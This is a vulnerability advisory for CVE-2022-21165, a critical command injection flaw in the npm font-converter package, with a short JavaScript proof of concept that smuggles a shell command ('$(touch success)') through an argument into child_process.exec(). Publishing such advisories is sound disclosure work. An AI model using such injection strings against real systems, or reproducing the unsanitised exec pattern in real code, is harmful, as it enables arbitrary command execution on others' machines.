CVE-2022-21165 — Font-Converter Vulnerable to Arbitrary Command Injection

Description

### Overview font-converter is a FontForge wrapper that allows conversion between different font formats (TTF, WOFF, OTF) All versions of this package are vulnerable to Arbitrary Command Injection due to missing sanitization of input that potentially flows into the `child_process.exec()` function. ### PoC ```js var PUT = require('font-converter'); var x = "$(touch success);# "; try { new PUT(x, x, x, x); } catch (e) { console.log(e); } ```

How to fix CVE-2022-21165

No fixed version has been published yet. Mitigate by removing the affected package or applying upstream guidance from the references below.

—no fix listed

Is CVE-2022-21165 being exploited?

Low — EPSS is 2.6%, meaning exploitation activity has not been observed at scale.

Affected packages (1)

from 0, <= 1.1.1

CVSS scores

Source	Version	Severity	Vector
osv	CVSS 3.1	CRITICAL9.8	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References (4)

ADVISORYnvd.nist.gov/vuln/detail/CVE-2022-21165
PATCHgithub.com/zgec/node-js-font-converter
WEBgithub.com/zgec/node-js-font-converter/blob/master/index.js#L12
WEBsecurity.snyk.io/vuln/SNYK-JS-FONTCONVERTER-2976194